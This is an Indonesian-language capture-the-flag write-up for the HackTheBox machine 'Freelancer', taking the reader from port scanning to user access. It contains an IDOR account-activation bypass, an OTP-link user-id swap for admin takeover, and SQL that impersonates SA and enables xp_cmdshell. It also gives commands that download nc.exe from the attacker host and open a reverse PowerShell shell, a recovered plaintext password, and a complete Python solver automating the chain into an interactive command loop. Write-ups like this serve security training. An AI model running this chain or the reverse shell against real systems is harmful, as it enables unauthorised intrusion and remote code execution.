# Freelancer
## User Flag
### Enumeration
Recon awal selalu pakai port scanning dan jika port http open kita dapat melakukan dirsearch.
```bash
naabu --host 10.129.57.150 -v -p - -nmap-cli 'nmap -sV' -o 10.129.57.150.port
__
___ ___ ___ _/ / __ __
/ _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/
projectdiscovery.io
[INF] Current naabu version 2.3.1 (latest)
[INF] Running CONNECT scan with non root privileges
10.129.57.150:49671
10.129.57.150:49667
10.129.57.150:3268
10.129.57.150:53
10.129.57.150:52941
10.129.57.150:9389
10.129.57.150:5985
10.129.57.150:636
10.129.57.150:3269
10.129.57.150:593
10.129.57.150:49670
10.129.57.150:135
10.129.57.150:49672
10.129.57.150:139
10.129.57.150:445
10.129.57.150:80
10.129.57.150:88
10.129.57.150:52945
10.129.57.150:389
10.129.57.150:55820
10.129.57.150:55824
[INF] Found 21 ports on host 10.129.57.150 (10.129.57.150)
[INF] Running nmap command: nmap -sV -p 55820,636,49670,139,49671,3268,135,52945,55824,9389,593,5985,3269,389,445,88,52941,49667,49672,53,80 10.129.57.150
Starting Nmap 7.95 ( https://nmap.org ) at 2024-06-02 20:44 WIB
Nmap scan report for freelancer.htb (10.129.57.150)
Host is up (0.30s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.25.5
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-02 18:44:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
52941/tcp filtered unknown
52945/tcp filtered unknown
55820/tcp open msrpc Microsoft Windows RPC
55824/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.38 seconds
```
hasil dirsearch kepada port 80.
```bash
dirsearch -u http://freelancer.htb
/usr/share/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11723
Output: /home/replican/Desktop/Prod/HackTheBox/machine/Freelancer/reports/http_freelancer.htb/__24-06-02_21-13-58.txt
Target: http://freelancer.htb/
[21:13:58] Starting:
[21:14:44] 400 - 157B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[21:14:48] 301 - 0B - /about -> /about/
[21:14:51] 301 - 0B - /accounts/login -> /accounts/login/
[21:14:55] 301 - 0B - /admin -> /admin/
[21:14:58] 302 - 0B - /admin/ -> /admin/login/?next=/admin/
[21:14:58] 302 - 0B - /admin/%3bindex/ -> /admin/login/?next=/admin/%253Bindex/
[21:14:58] 302 - 0B - /admin/.config -> /admin/login/?next=/admin/.config
[21:14:58] 302 - 0B - /admin/.htaccess -> /admin/login/?next=/admin/.htaccess
[21:14:58] 302 - 0B - /admin/_logs/access-log -> /admin/login/?next=/admin/_logs/access-log
[21:14:58] 302 - 0B - /admin/_logs/access.log -> /admin/login/?next=/admin/_logs/access.log
[21:14:58] 302 - 0B - /admin/_logs/access_log -> /admin/login/?next=/admin/_logs/access_log
[21:14:58] 302 - 0B - /admin/_logs/err.log -> /admin/login/?next=/admin/_logs/err.log
[21:14:58] 302 - 0B - /admin/_logs/error.log -> /admin/login/?next=/admin/_logs/error.log
[21:14:58] 302 - 0B - /admin/_logs/error-log -> /admin/login/?next=/admin/_logs/error-log
[21:14:58] 302 - 0B - /admin/_logs/error_log -> /admin/login/?next=/admin/_logs/error_log
[21:14:58] 302 - 0B - /admin/access.log -> /admin/login/?next=/admin/access.log
[21:14:58] 302 - 0B - /admin/access_log -> /admin/login/?next=/admin/access_log
[21:14:58] 302 - 0B - /admin/access.txt -> /admin/login/?next=/admin/access.txt
[21:14:58] 302 - 0B - /admin/account -> /admin/login/?next=/admin/account
[21:14:58] 302 - 0B - /admin/account.aspx -> /admin/login/?next=/admin/account.aspx
[21:14:58] 302 - 0B - /admin/account.php -> /admin/login/?next=/admin/account.php
[21:14:58] 302 - 0B - /admin/account.jsp -> /admin/login/?next=/admin/account.jsp
[21:14:58] 302 - 0B - /admin/account.js -> /admin/login/?next=/admin/account.js
[21:14:58] 302 - 0B - /admin/_logs/login.txt -> /admin/login/?next=/admin/_logs/login.txt
[21:14:58] 302 - 0B - /admin/admin-login -> /admin/login/?next=/admin/admin-login
[21:14:58] 302 - 0B - /admin/admin-login.php -> /admin/login/?next=/admin/admin-login.php
[21:14:58] 302 - 0B - /admin/admin-login.aspx -> /admin/login/?next=/admin/admin-login.aspx
[21:14:58] 302 - 0B - /admin/account.html -> /admin/login/?next=/admin/account.html
[21:14:59] 302 - 0B - /admin/admin-login.jsp -> /admin/login/?next=/admin/admin-login.jsp
[21:14:58] 302 - 0B - /admin/admin -> /admin/login/?next=/admin/admin
[21:14:59] 302 - 0B - /admin/admin-login.html -> /admin/login/?next=/admin/admin-login.html
[21:14:59] 302 - 0B - /admin/admin-login.js -> /admin/login/?next=/admin/admin-login.js
[21:14:59] 302 - 0B - /admin/admin.php -> /admin/login/?next=/admin/admin.php
[21:14:59] 302 - 0B - /admin/admin.jsp -> /admin/login/?next=/admin/admin.jsp
[21:14:59] 302 - 0B - /admin/admin.html -> /admin/login/?next=/admin/admin.html
[21:14:59] 302 - 0B - /admin/admin.js -> /admin/login/?next=/admin/admin.js
[21:14:59] 302 - 0B - /admin/admin.aspx -> /admin/login/?next=/admin/admin.aspx
[21:14:59] 302 - 0B - /admin/admin/login -> /admin/login/?next=/admin/admin/login
[21:14:59] 302 - 0B - /admin/admin_login -> /admin/login/?next=/admin/admin_login
[21:14:59] 302 - 0B - /admin/admin_login.aspx -> /admin/login/?next=/admin/admin_login.aspx
[21:14:59] 302 - 0B - /admin/admin_login.php -> /admin/login/?next=/admin/admin_login.php
[21:14:59] 302 - 0B - /admin/admin_login.html -> /admin/login/?next=/admin/admin_login.html
[21:14:59] 302 - 0B - /admin/adminLogin -> /admin/login/?next=/admin/adminLogin
[21:14:59] 302 - 0B - /admin/admin_login.js -> /admin/login/?next=/admin/admin_login.js
[21:14:59] 302 - 0B - /admin/admin_login.jsp -> /admin/login/?next=/admin/admin_login.jsp
[21:14:59] 302 - 0B - /admin/adminLogin.php -> /admin/login/?next=/admin/adminLogin.php
[21:15:00] 302 - 0B - /admin/adminLogin.aspx -> /admin/login/?next=/admin/adminLogin.aspx
[21:14:59] 302 - 0B - /admin/adminer.php -> /admin/login/?next=/admin/adminer.php
[21:15:00] 302 - 0B - /admin/backup/ -> /admin/login/?next=/admin/backup/
[21:15:00] 302 - 0B - /admin/adminLogin.js -> /admin/login/?next=/admin/adminLogin.js
[21:15:00] 302 - 0B - /admin/adminLogin.html -> /admin/login/?next=/admin/adminLogin.html
[21:15:00] 302 - 0B - /admin/backups/ -> /admin/login/?next=/admin/backups/
[21:15:00] 302 - 0B - /admin/controlpanel -> /admin/login/?next=/admin/controlpanel
[21:14:59] 302 - 0B - /admin/adminLogin.jsp -> /admin/login/?next=/admin/adminLogin.jsp
[21:15:00] 302 - 0B - /admin/config.php -> /admin/login/?next=/admin/config.php
[21:15:00] 302 - 0B - /admin/controlpanel.php -> /admin/login/?next=/admin/controlpanel.php
[21:15:00] 302 - 0B - /admin/controlpanel.aspx -> /admin/login/?next=/admin/controlpanel.aspx
[21:15:00] 302 - 0B - /admin/controlpanel.jsp -> /admin/login/?next=/admin/controlpanel.jsp
[21:15:00] 302 - 0B - /admin/cp.php -> /admin/login/?next=/admin/cp.php
[21:15:00] 302 - 0B - /admin/controlpanel.js -> /admin/login/?next=/admin/controlpanel.js
[21:15:00] 302 - 0B - /admin/cp -> /admin/login/?next=/admin/cp
[21:15:00] 302 - 0B - /admin/cp.aspx -> /admin/login/?next=/admin/cp.aspx
[21:15:00] 302 - 0B - /admin/cp.jsp -> /admin/login/?next=/admin/cp.jsp
[21:15:00] 302 - 0B - /admin/controlpanel.html -> /admin/login/?next=/admin/controlpanel.html
[21:15:00] 302 - 0B - /admin/cp.html -> /admin/login/?next=/admin/cp.html
[21:15:00] 302 - 0B - /admin/cp.js -> /admin/login/?next=/admin/cp.js
[21:15:00] 302 - 0B - /admin/data/autosuggest -> /admin/login/?next=/admin/data/autosuggest
[21:15:00] 302 - 0B - /admin/db/ -> /admin/login/?next=/admin/db/
[21:15:00] 302 - 0B - /admin/default -> /admin/login/?next=/admin/default
[21:15:00] 302 - 0B - /admin/default.asp -> /admin/login/?next=/admin/default.asp
[21:15:01] 302 - 0B - /admin/default/admin.asp -> /admin/login/?next=/admin/default/admin.asp
[21:15:01] 302 - 0B - /admin/default/login.asp -> /admin/login/?next=/admin/default/login.asp
[21:15:01] 302 - 0B - /admin/download.php -> /admin/login/?next=/admin/download.php
[21:15:01] 302 - 0B - /admin/dumper/ -> /admin/login/?next=/admin/dumper/
[21:15:01] 302 - 0B - /admin/error.log -> /admin/login/?next=/admin/error.log
[21:15:01] 302 - 0B - /admin/error.txt -> /admin/login/?next=/admin/error.txt
[21:15:01] 302 - 0B - /admin/error_log -> /admin/login/?next=/admin/error_log
[21:15:01] 302 - 0B - /admin/FCKeditor -> /admin/login/?next=/admin/FCKeditor
[21:15:01] 302 - 0B - /admin/errors.log -> /admin/login/?next=/admin/errors.log
[21:15:01] 302 - 0B - /admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx -> /admin/login/?next=/admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
[21:15:01] 302 - 0B - /admin/export.php -> /admin/login/?next=/admin/export.php
[21:15:01] 302 - 0B - /admin/fckeditor/editor/filemanager/connectors/asp/upload.asp -> /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
[21:15:01] 302 - 0B - /admin/fckeditor/editor/filemanager/connectors/asp/connector.asp -> /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
[21:15:01] 302 - 0B - /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx -> /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
[21:15:01] 302 - 0B - /admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php -> /admin/login/?next=/admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
[21:15:02] 302 - 0B - /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx -> /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
[21:15:02] 302 - 0B - /admin/fckeditor/editor/filemanager/connectors/php/connector.php -> /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/php/connector.php
[21:15:02] 302 - 0B - /admin/fckeditor/editor/filemanager/connectors/php/upload.php -> /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/php/upload.php
[21:15:02] 302 - 0B - /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx -> /admin/login/?next=/admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
[21:15:01] 302 - 0B - /admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp -> /admin/login/?next=/admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
[21:15:02] 302 - 0B - /admin/fckeditor/editor/filemanager/upload/asp/upload.asp -> /admin/login/?next=/admin/fckeditor/editor/filemanager/upload/asp/upload.asp
[21:15:02] 302 - 0B - /admin/fckeditor/editor/filemanager/upload/php/upload.php -> /admin/login/?next=/admin/fckeditor/editor/filemanager/upload/php/upload.php
[21:15:02] 302 - 0B - /admin/file.php -> /admin/login/?next=/admin/file.php
[21:15:02] 302 - 0B - /admin/files.php -> /admin/login/?next=/admin/files.php
[21:15:02] 302 - 0B - /admin/heapdump -> /admin/login/?next=/admin/heapdump
[21:15:02] 302 - 0B - /admin/home -> /admin/login/?next=/admin/home
[21:15:02] 302 - 0B - /admin/home.php -> /admin/login/?next=/admin/home.php
[21:15:02] 302 - 0B - /admin/home.jsp -> /admin/login/?next=/admin/home.jsp
[21:15:02] 302 - 0B - /admin/home.aspx -> /admin/login/?next=/admin/home.aspx
[21:15:02] 302 - 0B - /admin/home.js -> /admin/login/?next=/admin/home.js
[21:15:02] 302 - 0B - /admin/index -> /admin/login/?next=/admin/index
[21:15:02] 302 - 0B - /admin/home.html -> /admin/login/?next=/admin/home.html
[21:15:02] 302 - 0B - /admin/index.aspx -> /admin/login/?next=/admin/index.aspx
[21:15:02] 302 - 0B - /admin/index.jsp -> /admin/login/?next=/admin/index.jsp
[21:15:02] 302 - 0B - /admin/index.php -> /admin/login/?next=/admin/index.php
[21:15:02] 302 - 0B - /admin/includes/configure.php~ -> /admin/login/?next=/admin/includes/configure.php~
[21:15:02] 302 - 0B - /admin/index.html -> /admin/login/?next=/admin/index.html
[21:15:02] 302 - 0B - /admin/js/tiny_mce -> /admin/login/?next=/admin/js/tiny_mce
[21:15:02] 302 - 0B - /admin/index.js -> /admin/login/?next=/admin/index.js
[21:15:02] 302 - 0B - /admin/js/tiny_mce/ -> /admin/login/?next=/admin/js/tiny_mce/
[21:15:02] 302 - 0B - /admin/js/tinymce -> /admin/login/?next=/admin/js/tinymce
[21:15:03] 302 - 0B - /admin/js/tinymce/ -> /admin/login/?next=/admin/js/tinymce/
[21:15:03] 302 - 0B - /admin/log -> /admin/login/?next=/admin/log
[21:15:03] 302 - 0B - /admin/login -> /admin/login/?next=/admin/login
[21:15:03] 302 - 0B - /admin/log/error.log -> /admin/login/?next=/admin/log/error.log
[21:15:03] 302 - 0B - /admin/login.aspx -> /admin/login/?next=/admin/login.aspx
[21:15:03] 302 - 0B - /admin/login.php -> /admin/login/?next=/admin/login.php
[21:15:03] 302 - 0B - /admin/login.jsp -> /admin/login/?next=/admin/login.jsp
[21:15:03] 302 - 0B - /admin/login.html -> /admin/login/?next=/admin/login.html
[21:15:03] 302 - 0B - /admin/login.js -> /admin/login/?next=/admin/login.js
[21:15:03] 302 - 0B - /admin/login.asp -> /admin/login/?next=/admin/login.asp
[21:15:04] 302 - 0B - /admin/login.do -> /admin/login/?next=/admin/login.do
[21:15:04] 302 - 0B - /admin/login.py -> /admin/login/?next=/admin/login.py
[21:15:04] 302 - 0B - /admin/login.htm -> /admin/login/?next=/admin/login.htm
[21:15:04] 302 - 0B - /admin/login.rb -> /admin/login/?next=/admin/login.rb
[21:15:04] 302 - 0B - /admin/logon -> /admin/login/?next=/admin/logon
[21:15:04] 302 - 0B - /admin/logon.jsp -> /admin/login/?next=/admin/logon.jsp
[21:15:04] 302 - 0B - /admin/logon.aspx -> /admin/login/?next=/admin/logon.aspx
[21:15:04] 302 - 0B - /admin/logon.html -> /admin/login/?next=/admin/logon.html
[21:15:04] 302 - 0B - /admin/logs/access-log -> /admin/login/?next=/admin/logs/access-log
[21:15:04] 302 - 0B - /admin/logs/err.log -> /admin/login/?next=/admin/logs/err.log
[21:15:04] 302 - 0B - /admin/logs/access.log -> /admin/login/?next=/admin/logs/access.log
[21:15:04] 302 - 0B - /admin/logs/access_log -> /admin/login/?next=/admin/logs/access_log
[21:15:04] 302 - 0B - /admin/logon.php -> /admin/login/?next=/admin/logon.php
[21:15:04] 302 - 0B - /admin/logs/error-log -> /admin/login/?next=/admin/logs/error-log
[21:15:04] 302 - 0B - /admin/logon.js -> /admin/login/?next=/admin/logon.js
[21:15:04] 302 - 0B - /admin/logs/ -> /admin/login/?next=/admin/logs/
[21:15:04] 302 - 0B - /admin/logs/error.log -> /admin/login/?next=/admin/logs/error.log
[21:15:04] 302 - 0B - /admin/logs/error_log -> /admin/login/?next=/admin/logs/error_log
[21:15:04] 302 - 0B - /admin/logs/errors.log -> /admin/login/?next=/admin/logs/errors.log
[21:15:04] 302 - 0B - /admin/logs/login.txt -> /admin/login/?next=/admin/logs/login.txt
[21:15:04] 302 - 0B - /admin/manage.asp -> /admin/login/?next=/admin/manage.asp
[21:15:04] 302 - 0B - /admin/manage/admin.asp -> /admin/login/?next=/admin/manage/admin.asp
[21:15:04] 302 - 0B - /admin/manage -> /admin/login/?next=/admin/manage
[21:15:05] 302 - 0B - /admin/manage/login.asp -> /admin/login/?next=/admin/manage/login.asp
[21:15:05] 302 - 0B - /admin/mysql/index.php -> /admin/login/?next=/admin/mysql/index.php
[21:15:05] 302 - 0B - /admin/mysql/ -> /admin/login/?next=/admin/mysql/
[21:15:05] 302 - 0B - /admin/mysql2/index.php -> /admin/login/?next=/admin/mysql2/index.php
[21:15:05] 302 - 0B - /admin/phpMyAdmin -> /admin/login/?next=/admin/phpMyAdmin
[21:15:05] 302 - 0B - /admin/phpMyAdmin/ -> /admin/login/?next=/admin/phpMyAdmin/
[21:15:05] 302 - 0B - /admin/phpmyadmin/ -> /admin/login/?next=/admin/phpmyadmin/
[21:15:05] 302 - 0B - /admin/pMA/ -> /admin/login/?next=/admin/pMA/
[21:15:05] 302 - 0B - /admin/phpMyAdmin/index.php -> /admin/login/?next=/admin/phpMyAdmin/index.php
[21:15:05] 302 - 0B - /admin/pma/ -> /admin/login/?next=/admin/pma/
[21:15:05] 302 - 0B - /admin/phpmyadmin2/index.php -> /admin/login/?next=/admin/phpmyadmin2/index.php
[21:15:05] 302 - 0B - /admin/pma/index.php -> /admin/login/?next=/admin/pma/index.php
[21:15:05] 302 - 0B - /admin/PMA/index.php -> /admin/login/?next=/admin/PMA/index.php
[21:15:05] 302 - 0B - /admin/pol_log.txt -> /admin/login/?next=/admin/pol_log.txt
[21:15:05] 302 - 0B - /admin/phpmyadmin/index.php -> /admin/login/?next=/admin/phpmyadmin/index.php
[21:15:06] 302 - 0B - /admin/release -> /admin/login/?next=/admin/release
[21:15:06] 302 - 0B - /admin/private/logs -> /admin/login/?next=/admin/private/logs
[21:15:06] 302 - 0B - /admin/scripts/fckeditor -> /admin/login/?next=/admin/scripts/fckeditor
[21:15:06] 302 - 0B - /admin/secure/logon.jsp -> /admin/login/?next=/admin/secure/logon.jsp
[21:15:06] 302 - 0B - /admin/sqladmin/ -> /admin/login/?next=/admin/sqladmin/
[21:15:06] 302 - 0B - /admin/portalcollect.php?f=http://xxx&t=js -> /admin/login/?next=/admin/portalcollect.php%3Ff%3Dhttp%3A//xxx%26t%3Djs
[21:15:06] 302 - 0B - /admin/sxd/ -> /admin/login/?next=/admin/sxd/
[21:15:06] 302 - 0B - /admin/sysadmin/ -> /admin/login/?next=/admin/sysadmin/
[21:15:06] 302 - 0B - /admin/tinymce -> /admin/login/?next=/admin/tinymce
[21:15:06] 302 - 0B - /admin/upload.php -> /admin/login/?next=/admin/upload.php
[21:15:06] 302 - 0B - /admin/uploads.php -> /admin/login/?next=/admin/uploads.php
[21:15:06] 302 - 0B - /admin/signin -> /admin/login/?next=/admin/signin
[21:15:06] 302 - 0B - /admin/user_count.txt -> /admin/login/?next=/admin/user_count.txt
[21:15:06] 302 - 0B - /admin/views/ajax/autocomplete/user/a -> /admin/login/?next=/admin/views/ajax/autocomplete/user/a
[21:15:06] 302 - 0B - /admin/web/ -> /admin/login/?next=/admin/web/
[21:15:06] 302 - 0B - /admin/tiny_mce -> /admin/login/?next=/admin/tiny_mce
[21:15:53] 301 - 0B - /blog -> /blog/
[21:15:54] 200 - 19KB - /blog/
[21:16:07] 301 - 0B - /contact -> /contact/
[21:16:46] 400 - 157B - /index.php::$DATA
[21:18:00] 404 - 555B - /static/api/swagger.json
[21:18:00] 404 - 555B - /static/api/swagger.yaml
[21:18:00] 404 - 555B - /static/dump.sql
[21:18:12] 400 - 157B - /Trace.axd::$DATA
[21:18:24] 400 - 157B - /web.config::$DATA
Task Completed
```
terdapat port 80 lgsg kita pentest saja, terdapa bug validation idor. ketika kita register menjadi employer tidak akan bisa karna butuh divalidasi. lgsg saja kita akses
{% embed url="" %}
akses nya pake akun freelancer ( register jika belum )
dan input username employer yang kalian mau aktifkan
dan ketika sudah dijawab seperti yg kalian daftarkan sebelumnya maka akun emplyernya akan teraktivasi
terdapat fitur QR Code dan ketika kita scan qr nya
terdapat sebuah base64 MTAwMTE yang berarti 10011, seperti user id. disini saya mencoba menggantinya menjadi 2 yang di base64
contoh :
jadi : [http://freelancer.htb/accounts/login/otp/Mgo=/f41c9032a6f7c2c50ec62b7ef8b31d16/](http://freelancer.htb/accounts/login/otp/MTAwMTE=/f41c9032a6f7c2c50ec62b7ef8b31d16/)
dan yep kita jadi admin sekarang.seperti scanning dirsearch diatas ada path /admin kita lgsg kesana
pas aku coba show tables ternyata db ini adalah disini tujian kita yaitu spawn xp\_cmdshell karna ini windows juga.
### Bypassing sysadmin users
karna disini kita bukan sysadmin dan xp\_cmdshell di disable dengan sp\_configure. kita perlu melakukan privilage menggunakan command berikut
```sql
EXECUTE AS LOGIN = 'SA'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
```
```sql
-- this turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
-- this enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
```
dan sehabis itu kita baru dapat menggunakan xp\_cmdshell
lgsg saja kita buat revshell. disini saya pakai nc binary
```sql
xp_cmdshell 'echo IWR http://10.10.14.88:1337/nc.exe -OutFile %TEMP%\nc.exe | powershell -noprofile'
```
```sql
xp_cmdshell '%TEMP%\nc.exe 10.10.14.88 1338 -e powershell'
```
dan yep kita dapet in revshell
lgsg kita dump aja sql user pw nya buat dapetin mikasha user shell
IL0v3ErenY3ager ini pw nya tinggal RunAs aja yak ges
menggunakan RunAsCs.exe
### Solver python script
```python
import httpx
from bs4 import BeautifulSoup
from pwn import *
from PIL import Image
from io import BytesIO
from pyzbar.pyzbar import decode
import re
URL = "http://freelancer.htb"
# change this to debug if you want to see the csrf logger
context.log_level = 'info'
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.Client(base_url=url, proxy={
"http://" : "http://127.0.0.1:8080"
})
class API(BaseAPI):
def getCsrfToken(self,path):
if hasattr(self, 'admin_cookies'):
r = self.c.get(path, cookies={
'sessionid' : self.admin_cookies
}, follow_redirects=True)
else:
r = self.c.get(path)
self.csrf_token = r.cookies["csrftoken"]
soup = BeautifulSoup(r.text, "html.parser")
csrf = soup.find("input", {"name": "csrfmiddlewaretoken"})
if csrf:
csrf_value = csrf["value"]
self.csrf_middleware = csrf_value
debug(f"csrf/{self.csrf_middleware} from path{path}")
else:
csrf_value = re.findall(r'csrfmiddlewaretoken: "(.*?)"', r.text)
if len(csrf_value) >= 1:
self.csrf_middleware = csrf_value[0]
debug(f"csrf/{self.csrf_middleware} from path{path}")
else:
warn("csrf token/middleware is not found")
def FreelancerLogin(self, user, password):
path = "/accounts/login/"
self.getCsrfToken(path)
r = self.c.post(path, data={
"csrfmiddlewaretoken": self.csrf_middleware,
"username": user,
"password" : password
})
self.freelancer_sessionid = r.cookies["sessionid"]
info(f"success login freelancer account {user}:{password}")
def EmployerLogin(self, user, password):
path = "/accounts/login/"
self.getCsrfToken(path)
r = self.c.post(path, data={
"csrfmiddlewaretoken": self.csrf_middleware,
"username": user,
"password" : password
})
self.employer_sessionid = r.cookies["sessionid"]
info(f"success login employer account {user}:{password}")
def createAccountFreelancer(self, user, passwd):
path = "/freelancer/register/"
self.getCsrfToken(path)
r = self.c.post(path, data={
"csrfmiddlewaretoken": self.csrf_middleware,
"username": user,
"email" : f"{user}@gmail.com",
"first_name": user,
"last_name": user,
"address" : user,
"security_q1": user,
"security_q2": user,
"security_q3": user,
"job_title": user,
"years_of_experience": 33,
"description": user,
"password1": passwd,
"password2": passwd
}, cookies={
"csrftoken" : self.csrf_token
}, headers={'Content-Type': 'application/x-www-form-urlencoded'} )
api.FreelancerLogin(user,passwd)
def createAccountEmployer(self, user, passwd):
path = "/employer/register/"
self.getCsrfToken(path)
r = self.c.post(path, data={
"csrfmiddlewaretoken": self.csrf_middleware,
"username": user,
"email" : f"{user}@gmail.com",
"first_name": user,
"last_name": user,
"address" : user,
"security_q1": user,
"security_q2": user,
"security_q3": user,
"company_name": user,
"password1": passwd,
"password2": passwd
}, cookies={
"csrftoken" : self.csrf_token
}, headers={'Content-Type': 'application/x-www-form-urlencoded'} , follow_redirects=False)
info(f"success create emplyer account {user}:{passwd}")
def ActivateAccountIDOR(self, userEmployer, password):
path = "/accounts/recovery/"
self.getCsrfToken(path)
r = self.c.post(path, data={
"csrfmiddlewaretoken": self.csrf_middleware,
"username": userEmployer,
"security_q1": userEmployer,
"security_q2": userEmployer,
"security_q3": userEmployer,
}, cookies={
"sessionid":self.freelancer_sessionid
})
api.EmployerLogin(userEmployer, password)
return "success activate employer account through idor account recovery"
def GetQrCode(self, idTakeover):
path = "/accounts/otp/qrcode/generate/"
r = self.c.get(path, cookies={
"sessionid" :self.employer_sessionid
})
image = Image.open(BytesIO(r.content))
qr_codes = decode(image)
for qr_code in qr_codes:
match = re.search(r'otp/([^/]+)/', qr_code.data.decode('utf-8'))
if match:
otp_string = match.group(1)
decoded_otp_string = base64.b64decode(otp_string).decode()
encoded_idTakeover = base64.b64encode(idTakeover.encode()).decode()
info(f'changing id for otp {otp_string}:{decoded_otp_string} to {encoded_idTakeover}:{idTakeover}')
self.adminUrl = qr_code.data.decode('utf-8').replace(otp_string, encoded_idTakeover)
success(f'here the full link {self.adminUrl}, for admin takeover. enjoy it.' )
else:
error("No match found")
def LoginAdmin(self):
r = self.c.get(f"{self.adminUrl}")
self.admin_cookies = r.cookies["sessionid"]
def QuerySqli(self, query):
path = "/admin/executeRawSql/"
self.getCsrfToken("/admin")
return self.c.post(path, data={
'query': query,
'csrfmiddlewaretoken' : self.csrf_middleware
}, cookies={
'sessionid': self.admin_cookies
})
def BypassXpCmdShell(self):
api.LoginAdmin()
info(f'admin cookies : {self.admin_cookies}')
api.QuerySqli("""EXECUTE AS LOGIN = 'SA'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'""")
api.QuerySqli("""
-- this turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
-- this enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
""")
def RceSqli(self,cmd):
rows = api.QuerySqli(f"xp_cmdshell '{cmd}'").json().get('result', {}).get('rows', [])
for row in rows:
if len(row) >= 1:
success(row[0])
...
if __name__ == "__main__":
api = API()
api.createAccountFreelancer('replicannormal', '@Hack4you1337')
api.createAccountEmployer('replicanlw', '@Hack4you1337')
info(api.ActivateAccountIDOR('replicanlw', '@Hack4you1337'))
api.GetQrCode(idTakeover='2')
isRce = input(info('do u want to get the rce automatically through xp_cmdshell? (y/n)'))
if "y" or "Y" in isRce:
api.BypassXpCmdShell()
while True:
cmd = input('cmd > ')
api.RceSqli(cmd)
```